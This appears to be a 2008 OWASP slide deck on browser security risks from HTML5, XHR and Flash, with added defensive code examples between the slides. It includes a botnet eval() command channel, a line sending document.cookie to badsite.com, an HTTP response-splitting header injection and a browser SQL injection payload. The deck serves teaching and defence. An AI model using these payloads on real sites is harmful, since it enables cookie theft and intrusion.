Browser security
- 1. Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
OWASP – Browser Security
Roberto Suggi Liverani
Security Consultant
Security-Assessment.com
3 September 2008
- 2. OWASP
Who am I?
Roberto Suggi Liverani
Security Consultant, CISSP - Security-Assessment.com
4+ years in information security, focusing on web application and network security
OWASP New Zealand founder/leader
- 3. OWASP
Agenda
Introduction
A look to the present
The potential risks
Some challenges
HTML 5.0
WebApps (XHR)
Browser Plugins
OWASP approach to the problem
OWASP Intrinsic Group
- 6. OWASP
Introduction
The risks are not just in the numbers…
Do you remember the “On the job browser exploitation” talk by Mark Piper?
Technologies evolve:
HTML5
XHR
Browser plugins
Current browser security progress is mainly focused on:
Reflected XSS filtering and CSRF protection
Phishing web site detection
- 7. OWASP
Next Challenges
HTML5 (W3C working draft)
New features with a security impact:
Origin-Policy
Browsing contexts and navigation
Custom protocol and content handlers
Structured client-side storage
Offline Web applications
Cross-document messaging
Server-sent events
Web sockets
- 9. OWASP
HTML5
Browsing Contexts and Navigation
Opener browsing context – 1.COM (vulnerable)
Nested browsing context – 2.COM (iframe)
Auxiliary browsing context – 3.COM (malicious third party)
Scenario:
(a) Injection in 1.COM of a document.open pointing to 3.COM
(b) Iframe injection with src=2.COM
Result: cross-context scripting between 2.COM and 3.COM
- 10. OWASP
HTML5
Custom Protocol and Content Handlers
registerProtocolHandler() – ftp:, fax:, foo:
registerContentHandler() – MIME type, e.g. text/foo
Example flow:
A.COM registers: navigator.registerContentHandler('text/foo', 'foo?url=%s', 'foo')
B.COM serves: <a href=test.foo>Download</a>, with test.foo served as text/foo
Clicking the link redirects the user to http://a.com/foo?url=b.com/test.foo (the resource URL, percent-encoded, is substituted for %s)
- 11. OWASP
HTML5
Hijacking content or protocol handlers
navigator.registerProtocolHandler('HTTPS', 'foo?url=%s', 'foo') – a site trying to take over an existing scheme
Register spamming
A site tries to register multiple protocol/content handlers
Multiple sites try to register the video/mpeg content type
Leaking intranet URLs
User registers a certain content handler (text/foo)
User clicks http://192.168.0.32/hello.foo
User is redirected to the external site which handles text/foo, with the intranet URL in the query string
Leaking HTTPS
User is redirected from a site with an HTTPS URL to the handler site
Whatever that HTTPS URL carries (e.g. session tokens) leaks in the GET request to the handler
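The two slides above describe how a registered handler rewrites the URL of a clicked resource and why hijacking, intranet leaks and HTTPS leaks follow from that. The following is an added example, not code from the slides: it models the browser's template expansion and the checks a user agent should apply before accepting a registration. The blocked-scheme list, the same-origin rule and the host names (a.com, bank.example) are assumptions for illustration.

```javascript
// Added example, not code from the slides: models how a browser expands a
// registerContentHandler()/registerProtocolHandler() template and which
// registrations a user agent should refuse. The blocked-scheme list, the
// same-origin rule and the host names are assumptions for illustration.

// The browser percent-encodes the absolute URL of the clicked resource,
// substitutes it for "%s" and navigates there with a GET request.
function expandHandlerTemplate(template, resourceUrl) {
  return template.replace('%s', encodeURIComponent(resourceUrl));
}

// Schemes a page must never be allowed to take over (assumed list).
const BLOCKED_SCHEMES = ['http', 'https', 'file', 'javascript', 'data', 'about'];

// Returns null when the registration is acceptable, otherwise the reason.
function vetRegistration(kind, name, template, registeringOrigin) {
  if (!template.includes('%s')) return 'template has no %s placeholder';
  const templateUrl = new URL(template, registeringOrigin + '/');
  // The handler must live on the origin that registered it, otherwise a page
  // could route another site's clicks wherever it likes.
  if (templateUrl.origin !== registeringOrigin) return 'template is not same-origin';
  if (kind === 'protocol' && BLOCKED_SCHEMES.includes(name.toLowerCase())) {
    return 'scheme ' + name + ' cannot be registered';
  }
  return null;
}

// What a click on a handled resource discloses: the handler's origin receives
// the full resource URL in its query string.
function leakedByClick(template, resourceUrl) {
  const target = new URL(expandHandlerTemplate(template, resourceUrl));
  return { sentTo: target.origin, leaked: target.searchParams.get('url') };
}

// Constructed scenarios from the slides: the intranet link, and an HTTPS link
// carrying a session token in its query string.
const A_COM_HANDLER = 'http://a.com/foo?url=%s';
const intranetLeak = leakedByClick(A_COM_HANDLER, 'http://192.168.0.32/hello.foo');
const httpsLeak = leakedByClick(A_COM_HANDLER, 'https://bank.example/statement.foo?session=s3cr3t');
const hijack = vetRegistration('protocol', 'HTTPS', 'foo?url=%s', 'http://a.com');

console.log(intranetLeak, httpsLeak, hijack);
```

The expansion step is what makes the leaks possible: nothing in the mechanism distinguishes an internal address or a token-bearing HTTPS URL from any other resource, so the only place to intervene is at registration time (refusing hijacks and cross-origin templates) or by asking the user before redirecting.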
- 12. OWASP
HTML5
Structured Client-side Storage
sessionStorage (per-origin data scoped to one top-level browsing context, i.e. one tab or window, and shared by all pages of that origin opened in it)
localStorage (persistent per-origin data kept in the client's cache)
Methods: getItem(), setItem()
Only protection: same-origin policy
SQL, yes SQL!!! – to store more structured data
Methods: openDatabase(), transaction(), executeSql()
Objects: SQLResultSet, SQLResultSetRowList, SQLError
More to come on “browser SQL injection”…
- 13. OWASP
HTML5
Client Storage Attack Example (A. Trivero)
Browser SQL Injection Example (A. Trivero)
Cross-Directory Attack
XSS in www.geocities.com/user1 can read/write data from/to www.geocities.com/user2 (storage is keyed by origin, not by path)
User Tracking – a unique ID put in client storage by multiple sites (marketing, botnet, etc.)
Cookie Resurrection – a deleted cookie is recreated from the copy kept in client storage
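The two storage slides make two points: storage is partitioned by origin only, and the client-side SQL API is injectable in exactly the way server-side SQL is. The following is an added example, not code from the slides or from A. Trivero's paper. `FakeDatabase` is a stand-in that only records what a real `openDatabase()` transaction would execute; the table names, the geocities URLs and the payload are constructed.

```javascript
// Added example, not code from the slides or from A. Trivero's paper: shows
// why client-side storage is shared by every page on an origin, and a
// string-built Web SQL query beside its parameterised form. FakeDatabase is
// a stand-in that records what a real openDatabase() transaction would run.

// Storage is keyed by origin only (scheme, host, port); the path is ignored,
// so /user1 and /user2 on the same host share localStorage and databases.
function storageBucket(pageUrl) {
  return new URL(pageUrl).origin;
}

function sharesStorage(urlA, urlB) {
  return storageBucket(urlA) === storageBucket(urlB);
}

// Stand-in for the Web SQL database: records executeSql() calls and runs nothing.
class FakeDatabase {
  constructor() { this.calls = []; }
  transaction(fn) {
    const calls = this.calls;
    fn({ executeSql(sql, args) { calls.push({ sql, args: args || [] }); } });
  }
  last() { return this.calls[this.calls.length - 1]; }
}

// Vulnerable: user-controlled input is concatenated into the statement text,
// so a quote in the input ends the literal and the rest becomes SQL.
function lookupNoteVulnerable(db, title) {
  db.transaction(function (tx) {
    tx.executeSql("SELECT body FROM notes WHERE title = '" + title + "'");
  });
  return db.last();
}

// Hardened: the value travels as a bound argument and is never parsed as SQL.
function lookupNoteSafe(db, title) {
  db.transaction(function (tx) {
    tx.executeSql('SELECT body FROM notes WHERE title = ?', [title]);
  });
  return db.last();
}

// Constructed payload: closes the literal and unions in another table.
const PAYLOAD = "x' UNION SELECT password FROM credentials --";
const vulnerable = lookupNoteVulnerable(new FakeDatabase(), PAYLOAD);
const safe = lookupNoteSafe(new FakeDatabase(), PAYLOAD);
console.log(vulnerable.sql);          // the UNION is now part of the query
console.log(safe.sql, safe.args);     // the payload stays a plain string value
```

Because the database lives on the client, the "attacker" in the browser SQL injection case is usually an XSS payload on the same origin, and, as the cross-directory point shows, any path on that origin will do.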
- 14. OWASP
HTML5
Offline Web Applications
Extensive Application Cache API
<html manifest="http://a.com/manifest">
The HTTP response for the manifest must use the text/cache-manifest MIME type
The manifest specifies how specific site content should be cached = application cache policy
New items can be added to a specific application cache with the add() method
Different versions of cached content can exist for the same site
Application cache status can be queried: UNCACHED, IDLE, CHECKING, DOWNLOADING, UPDATEREADY
- 15. OWASP
HTML5
Application Cache Poisoning
A.COM's manifest allows caching of a vulnerable HTML page containing DOM-based XSS
The DOM XSS manipulates data when the page is viewed in offline mode (the cached copy stays until the manifest itself changes)
Attacking the offline browser
Offline application cache content with stored XSS that makes the application behave as if navigator.onLine were true
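The manifest decides which pages the browser will serve from the application cache, which is why a vulnerable page listed there keeps being served offline. The following is an added example, not code from the slides: a parser for the text/cache-manifest format and a check of what is answered from cache when offline. The manifest text, the host a.com and the page name vuln.html (standing for the DOM-XSS page in the poisoning scenario) are constructed.

```javascript
// Added example, not code from the slides: a parser for text/cache-manifest
// and a check of which URLs the application cache serves offline. The
// manifest text and URLs are constructed for the example.

// Sections: entries before any header and under CACHE: are cached explicitly;
// NETWORK: lists online-only URLs ("*" = everything else); FALLBACK: pairs a
// URL prefix with the cached page to show when the prefix cannot be fetched.
function parseCacheManifest(text, manifestUrl) {
  const lines = text.split(/\r\n|\r|\n/);
  if (lines[0].trim() !== 'CACHE MANIFEST') throw new Error('not a cache manifest');
  const out = { cache: [], network: [], fallback: [], networkWildcard: false };
  let section = 'cache';
  for (const raw of lines.slice(1)) {
    const line = raw.trim();
    if (line === '' || line.startsWith('#')) continue;      // blank or comment
    if (line === 'CACHE:') { section = 'cache'; continue; }
    if (line === 'NETWORK:') { section = 'network'; continue; }
    if (line === 'FALLBACK:') { section = 'fallback'; continue; }
    const parts = line.split(/\s+/);
    if (section === 'cache') {
      out.cache.push(new URL(parts[0], manifestUrl).href);
    } else if (section === 'network') {
      if (parts[0] === '*') out.networkWildcard = true;
      else out.network.push(new URL(parts[0], manifestUrl).href);
    } else if (parts.length >= 2) {
      out.fallback.push([new URL(parts[0], manifestUrl).href, new URL(parts[1], manifestUrl).href]);
    }
  }
  return out;
}

// Offline, the browser answers from the cache for the master page (the one
// whose <html manifest> referenced the manifest) and every explicit CACHE
// entry; other URLs fail unless a FALLBACK prefix matches. Returns the URL
// whose cached copy is shown, or null.
function servedOffline(manifest, masterUrl, requestUrl) {
  if (requestUrl === masterUrl || manifest.cache.includes(requestUrl)) return requestUrl;
  for (const [prefix, fallback] of manifest.fallback) {
    if (requestUrl.startsWith(prefix)) return fallback;
  }
  return null;
}

// Constructed manifest: vuln.html stands for the page with DOM-based XSS.
const MANIFEST_TEXT = [
  'CACHE MANIFEST',
  '# constructed for the example',
  'CACHE:',
  '/app.js',
  '/vuln.html',
  'NETWORK:',
  '*',
  'FALLBACK:',
  '/ /offline.html',
].join('\n');

const MANIFEST = parseCacheManifest(MANIFEST_TEXT, 'http://a.com/manifest');
console.log(MANIFEST);
console.log(servedOffline(MANIFEST, 'http://a.com/index.html', 'http://a.com/vuln.html'));
```

The practical check for a site owner is to read its own manifest this way and ask, for each cached entry, whether that page is safe to keep serving without the server ever seeing the request again.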
- 16. OWASP
HTML5
Cross Document Messaging
“While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile” – 7.4 W3C HTML5 current draft
postMessage(message, messagePort, targetOrigin)

B.COM (receiver, loaded in an iframe):
window.addEventListener('message', receiver, false);
function receiver(e) {
  if (e.origin == 'http://a.com') {   // NOTE: this condition can be omitted
    if (e.data == 'Hello world') {
      e.source.postMessage('Hello', e.origin);
    } else {
      alert(e.data);
    }
  }
}

A.COM (sender):
var o = document.getElementsByTagName('iframe')[0];
o.contentWindow.postMessage('Hello world', 'http://b.com/');   // NOTE: targetOrigin can be '*'
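The receiver's origin check and the sender's targetOrigin are the only two controls in cross-document messaging. The following is an added example, not the slides' snippet: it runs a receiver with an exact origin check beside the two weak patterns (no check, substring check) and models the sender-side targetOrigin rule. Events and frames are constructed objects so the logic runs outside a browser; a.com, b.com and evil.net are illustrative names.

```javascript
// Added example, not the slides' snippet: a receiver that validates e.origin
// exactly, beside the two weak patterns (no check, substring check) that make
// cross-document messaging exploitable, and the sender's targetOrigin rule.
// Events and frames are constructed objects so the logic runs outside a browser.

// Builds a 'message' listener that only hands data to `onAccepted` when the
// origin check passes. Returns the verdict so it can be inspected.
function makeReceiver(check, onAccepted) {
  return function receiver(e) {
    if (!check(e.origin)) return 'dropped';
    onAccepted(e.data);
    return 'accepted';
  };
}

// Weak: the slides' "condition can be omitted" case; anything is accepted.
const noCheck = () => true;
// Weak: a substring match also admits http://a.com.evil.net or http://evil.net/a.com
const substringCheck = (origin) => origin.indexOf('a.com') !== -1;
// Correct: exact comparison against the full serialised origin.
const exactCheck = (origin) => origin === 'http://a.com';

// Dispatches one constructed MessageEvent to a receiver built with `check`.
function deliver(check, origin, data) {
  const seen = [];
  const verdict = makeReceiver(check, (d) => seen.push(d))({ origin, data, source: null });
  return { verdict, seen };
}

// Sender side. A concrete targetOrigin makes the browser drop the message if
// the frame has meanwhile been navigated to another origin; '*' delivers to
// whatever is loaded there.
function sendTo(frame, message, targetOrigin) {
  if (targetOrigin !== '*' && frame.origin !== targetOrigin) return 'not delivered';
  frame.receive({ origin: 'http://a.com', data: message, source: null });
  return 'delivered';
}

console.log(deliver(substringCheck, 'http://a.com.evil.net', 'spoofed'));   // accepted
console.log(deliver(exactCheck, 'http://a.com.evil.net', 'spoofed'));       // dropped
```

The exact comparison is the whole defence on the receiving side; on the sending side a concrete targetOrigin is what stops a message with secrets from landing in a frame the attacker has navigated elsewhere.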
- 17. OWASP
HTML5
Server-Sent Events
Dispatching DOM events into a document that expects them
RemoteEventTarget is used to fetch data sent as an event stream (text/event-stream) from:
The same site
Allowed sites (XHR access control)
<eventsource src="http://news.com/news.php"
  onmessage="var stream = event.data.split('\n');
             showNews(stream[0], stream[1], stream[2]);">
The event stream, pulled by the browser (consecutive data: lines of one event are joined with '\n'):
data: http://www.google.com/news/1
data: http://www.yahoo.com/news/3
data: http://bbc.co.uk/news/2
- 18. OWASP
HTML5
Next generation web botnet – C&C interface
Stored XSS in botnet websites:
<eventsource src="http://badsite.com/evil.php"
  onmessage="var stream = event.data.split('\n');
             for (var i = 0; i < stream.length; i++) eval(stream[i]);">
Data stream served by badsite.com/evil.php (MIME: text/event-stream):
data: wait();
data: wait();
data: document.write('<img src=\"http://badsite.com/' + document.cookie + '\">');
The botnet operates within the XHR access control rules for data exchange: the C&C server only has to allow the victim sites' origins
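The two event-source slides above both come down to the same thing: a text/event-stream is a sequence of `data:` lines that the page turns into `event.data`, and what the page then does with that string decides whether it is a news feed or a command channel. The following is an added example, not code from the slides: a parser for the format, the eval() consumer the botnet relies on, and a consumer that only accepts an allow-listed command schema. The stream text and the command names are constructed; `run` is injected in place of a direct eval() so the example runs anywhere.

```javascript
// Added example, not code from the slides: a text/event-stream parser and two
// consumers of the parsed messages: the eval() pattern the botnet slide relies
// on and a consumer that only accepts a fixed command schema. Stream text and
// command names are constructed.

// Splits a text/event-stream body into messages: "data:" lines accumulate
// (joined with "\n"), "event:"/"id:" set fields, a blank line dispatches the
// message, and lines starting with ":" are comments.
function parseEventStream(body) {
  const messages = [];
  let data = [], event = 'message', id = null;
  const dispatch = () => {
    if (data.length) messages.push({ event, id, data: data.join('\n') });
    data = []; event = 'message';
  };
  for (const raw of body.split(/\r\n|\r|\n/)) {
    if (raw === '') { dispatch(); continue; }
    if (raw.startsWith(':')) continue;
    const colon = raw.indexOf(':');
    const field = colon === -1 ? raw : raw.slice(0, colon);
    let value = colon === -1 ? '' : raw.slice(colon + 1);
    if (value.startsWith(' ')) value = value.slice(1);   // one leading space is stripped
    if (field === 'data') data.push(value);
    else if (field === 'event') event = value;
    else if (field === 'id') id = value;
  }
  dispatch();
  return messages;
}

// The C&C pattern: every message body is handed to the script engine. `run`
// stands in for eval() so the flow can be observed without executing anything.
function evalConsumer(messages, run) {
  return messages.map((m) => run(m.data));
}

// Hardened consumer: the body must be JSON of the form {cmd, args} and cmd
// must be on the allow-list; everything else is rejected, never executed.
const ALLOWED = {
  showNews: (args) => 'news:' + args.join(','),
  wait: () => 'wait',
};
function strictConsumer(messages) {
  return messages.map((m) => {
    let parsed;
    try { parsed = JSON.parse(m.data); } catch (e) { return 'rejected'; }
    if (!parsed || typeof parsed.cmd !== 'string' || !Array.isArray(parsed.args)) return 'rejected';
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, parsed.cmd)) return 'rejected';
    return ALLOWED[parsed.cmd](parsed.args);
  });
}

// Constructed stream: two botnet-style script lines, then two JSON commands,
// one allowed and one trying to smuggle eval through the schema.
const STREAM = [
  'data: wait();',
  '',
  'data: document.write("<img src=\'http://badsite.com/\' + document.cookie>");',
  '',
  'data: {"cmd":"showNews","args":["a","b"]}',
  '',
  'data: {"cmd":"eval","args":["alert(1)"]}',
  '',
].join('\n');

const MESSAGES = parseEventStream(STREAM);
console.log(evalConsumer(MESSAGES, (s) => 'would eval: ' + s));
console.log(strictConsumer(MESSAGES));   // [ 'rejected', 'rejected', 'news:a,b', 'rejected' ]
```

The parser is the same in both cases; the difference is entirely in the consumer. The allow-list keeps the server able to push new items to the page while removing its ability to push code.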
- 19. OWASP
HTML5
Web Sockets – new WebSocket(url)
Botnet scenario applies as well
Client at 123.com → Server at aa.com (draft handshake; note the browser attaches ambient credentials):
GET / HTTP/1.1
Upgrade: WebSocket
Connection: Upgrade
Host: aa.com
Origin: http://123.com
Authorization: Basic d2FsbGU6ZXZl
Server at aa.com → Client at 123.com:
HTTP/1.1 101 Web Socket Protocol Handshake
Upgrade: WebSocket
Connection: Upgrade
WebSocket-Origin: http://123.com
WebSocket-Location: ws://aa.com:80/
Data framing (both directions): send/read raw UTF-8 data byte per byte
Close: either side simply closes the TCP/IP connection – no closing handshake
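The handshake above carries the page's origin and the user's ambient credentials; since the browser will open a socket from any page, the Origin header is what a server must check to keep the botnet scenario from applying to it. The following is an added example, not code from the slides: server-side validation of the draft-style opening handshake with an Origin allow-list. The request text is constructed from the slide's exchange; the host names are the slide's.

```javascript
// Added example, not code from the slides: server-side validation of the
// draft-style WebSocket opening handshake shown above, with an Origin
// allow-list. Without the Origin check any page can open a socket to the
// server carrying the user's ambient credentials. The request is constructed.

// Splits the raw request into the request line and a lower-cased header map.
function parseHandshake(text) {
  const lines = text.split('\r\n');
  const [method, target, version] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    if (line === '') break;                       // end of headers
    const i = line.indexOf(':');
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, version, headers };
}

// Returns the 101 response text, or an HTTP error status line.
function acceptHandshake(requestText, allowedOrigins, serverHost) {
  const req = parseHandshake(requestText);
  if (req.method !== 'GET' || req.version !== 'HTTP/1.1') return 'HTTP/1.1 400 Bad Request';
  if ((req.headers['upgrade'] || '').toLowerCase() !== 'websocket' ||
      (req.headers['connection'] || '').toLowerCase() !== 'upgrade') return 'HTTP/1.1 400 Bad Request';
  if (req.headers['host'] !== serverHost) return 'HTTP/1.1 400 Bad Request';
  const origin = req.headers['origin'];
  // The browser sets Origin and the page cannot change it; the server decides
  // which sites may talk to it. Echoing it back blindly would accept everyone.
  if (!allowedOrigins.includes(origin)) return 'HTTP/1.1 403 Forbidden';
  return [
    'HTTP/1.1 101 Web Socket Protocol Handshake',
    'Upgrade: WebSocket',
    'Connection: Upgrade',
    'WebSocket-Origin: ' + origin,
    'WebSocket-Location: ws://' + serverHost + req.target,
    '', '',
  ].join('\r\n');
}

// Constructed request matching the slide's exchange (client page at 123.com).
const REQUEST = [
  'GET / HTTP/1.1',
  'Upgrade: WebSocket',
  'Connection: Upgrade',
  'Host: aa.com',
  'Origin: http://123.com',
  'Authorization: Basic d2FsbGU6ZXZl',
  '', '',
].join('\r\n');

console.log(acceptHandshake(REQUEST, ['http://123.com'], 'aa.com'));   // 101
console.log(acceptHandshake(REQUEST, ['http://aa.com'], 'aa.com'));    // 403
```

A server that accepts every Origin is reachable from a stored XSS on any site, with the victim's cookies and Basic credentials attached, which is exactly the "botnet scenario applies as well" point.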
- 20. OWASP
WebApps (XHR)
XHR Access Control (GET and POST)
Resource: aaa.com/test.txt
Client: bbb.com
JavaScript + XHR on bbb.com:
var client = new XMLHttpRequest();
client.open("GET", "http://aaa.com/test.txt");   // or POST
client.onreadystatechange = function() { /* do something */ };
client.send();
HTTP response from aaa.com:
Access-Control-Allow-Origin: http://bbb.com

Hello World!
NOTE: the entire access control system relies on HTTP headers
So what happens with an HTTP response splitting attack? If aaa.com reflects part of the request path into a response header without stripping CR/LF, the attacker can inject the header that grants access:
var client = new XMLHttpRequest();
client.open("GET", "http://aaa.com/test.txt%0D%0AAccess-Control-Allow-Origin: http://bbb.com%0D%0A%0D%0A");
client.onreadystatechange = function() { /* do something */ };
client.send();
- 21. OWASP
WebApps (XHR)
XHR Access Control (other HTTP methods)
Resource: aaa.com/test.txt
Client: bbb.com
For methods other than GET and POST the browser first sends a preflight request on its own:
OPTIONS http://aaa.com/test.txt
HTTP response from aaa.com:
Access-Control-Allow-Origin: http://bbb.com
Access-Control-Max-Age: 3628800
Only then is the script's actual request sent:
var client = new XMLHttpRequest();
client.open("DELETE", "http://aaa.com/test.txt");
client.onreadystatechange = function() { /* do something */ };
client.send();
NOTE: the entire access control system relies on HTTP headers
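Both XHR access control slides end on the same note: the decision lives entirely in response headers, so the server has to produce them carefully and must not let anything else write into them. The following is an added example, not code from the slides: the server side of the scheme, computing the Access-Control-* headers for a simple request and for an OPTIONS preflight from an allow-list rather than by echoing Origin, plus the header-value check that defeats the response-splitting trick. Requests are constructed objects; the allow-lists and the Max-Age value follow the slides.

```javascript
// Added example, not code from the slides: server-side computation of the
// Access-Control-* headers for a simple request and for an OPTIONS preflight,
// from an allow-list rather than by echoing Origin, plus the CR/LF check that
// stops a reflected value from splitting the response. Requests are constructed.

const ALLOWED_ORIGINS = ['http://bbb.com'];
const ALLOWED_METHODS = ['GET', 'POST', 'DELETE'];

// A header value may never contain CR or LF; an attacker who can get one in
// (e.g. through a reflected path) appends headers of their own.
function safeHeaderValue(value) {
  if (/[\r\n]/.test(value)) throw new Error('CR/LF in header value');
  return value;
}

// Returns the CORS response headers for `req` ({ method, headers }), or an
// empty object when the origin (or the preflighted method) is not allowed,
// in which case the browser blocks the cross-site read.
function corsHeaders(req) {
  const origin = req.headers['origin'];
  if (!origin || !ALLOWED_ORIGINS.includes(origin)) return {};
  // Echoing an arbitrary Origin back would be equivalent to allowing everyone.
  const h = { 'Access-Control-Allow-Origin': safeHeaderValue(origin), 'Vary': 'Origin' };
  const wanted = req.headers['access-control-request-method'];
  if (req.method === 'OPTIONS' && wanted) {
    if (!ALLOWED_METHODS.includes(wanted)) return {};        // preflight fails
    h['Access-Control-Allow-Methods'] = ALLOWED_METHODS.join(', ');
    h['Access-Control-Max-Age'] = '3628800';                 // cache the preflight result
  }
  return h;
}

// Constructed requests from the slides' scenario.
const simpleRequest = { method: 'GET', headers: { origin: 'http://bbb.com' } };
const preflight = { method: 'OPTIONS', headers: { origin: 'http://bbb.com', 'access-control-request-method': 'DELETE' } };
const strangerRequest = { method: 'GET', headers: { origin: 'http://evil.example' } };

console.log(corsHeaders(simpleRequest));
console.log(corsHeaders(preflight));
console.log(corsHeaders(strangerRequest));   // {}
```

The splitting payload on the earlier slide only works if some server code writes attacker-controlled text into a header; `safeHeaderValue` is the check that code needs on every such value, not only on the access-control headers.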
- 22. OWASP
XHR Alternative – XDR (XDomainRequest)
Cross-domain request developed by Microsoft (IE8)
Resource: aaa.com/xdr.txt
Client: bbb.com
JavaScript + XDR on bbb.com:
var xdr = new XDomainRequest();
xdr.open("GET", "http://www.aaa.com/xdr.txt");
xdr.send();
HTTP request:
GET /xdr.txt
XDomainRequest: 1
Host: www.aaa.com
HTTP response:
XDomainRequestAllowed: 1

Hello!
NOTE: the entire XDR mechanism relies on HTTP headers
- 23. OWASP
Browser Plugins
Adobe Flash
LSO (Local Shared Objects)
Cookie system completely managed by Adobe
100 KB of data allowed by default
Third-party LSOs are allowed by default (100 KB)
LSO data is stored and accessed “stealthily”, outside the browser's cookie controls
Typically stored in:
C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player
Files have the .sol extension
This “feature” has already been exploited:
United Virtualities -> PIE (Persistent Identification Element)
Creates a unique ID for each browser and then stores it in an LSO
- 24. OWASP
Browser Plugins
ActionScript FileReference.download() bypasses browser security settings
IKAT's Paul Craig 0day technique to bypass kiosk software protection (IE's security model)
Something like:
test.addEventListener(MouseEvent.CLICK, downloadFile);
var fileRef:FileReference = new FileReference();
function downloadFile(event:MouseEvent):void {
  fileRef.download(new URLRequest("http://www.aaa.com/file.html"), "file.html");
}
- 25. OWASP
OWASP Intrinsic Group
Aid browser vendors and framework vendors in addressing current security issues
Focus on:
HTML5 Working Group
XMLHTTPRequest
Webapp Working Group
Mozilla Firefox
Adobe (AIR/Flash)
Microsoft IE7
Microsoft .NET
Struts
Spring
Apache Commons
Soon: OWASP Top Ten Browser Security
- 27. OWASP
References
HTML5
http://www.whatwg.org/specs/web-apps/current-work
XHR and XHR Level 2
https://wiki.mozilla.org/Cross_Site_XMLHttpRequest
http://dev.w3.org/2006/webapi/XMLHttpRequest-2
Access Controls XHR
http://www.w3.org/TR/access-control/
XDR
http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
http://lists.w3.org/Archives/Public/public-appformats/2008Mar/0017.html
LSO
http://epic.org/privacy/cookies/flash.html
https://www.flashsec.org/wiki/Shared_Objects#Storage_location
http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html
http://www.adobe.com/products/flashplayer/articles/lso/
http://en.wikipedia.org/wiki/Local_Shared_Object
- 28. OWASP
References
HTML5 - Presentation
http://www.owasp.org/index.php/AppSecEU08_HTML5
Abusing HTML 5 Structured Client-side Storage
http://trivero.secdiscover.com/html5whitepaper.pdf
Web Stats
http://www.internetworldstats.com/stats.htm
Browser Stats
http://www.w3schools.com/browsers/browsers_stats.asp
Editor's Notes
- UPDATEREADY -> the application cache is not the newest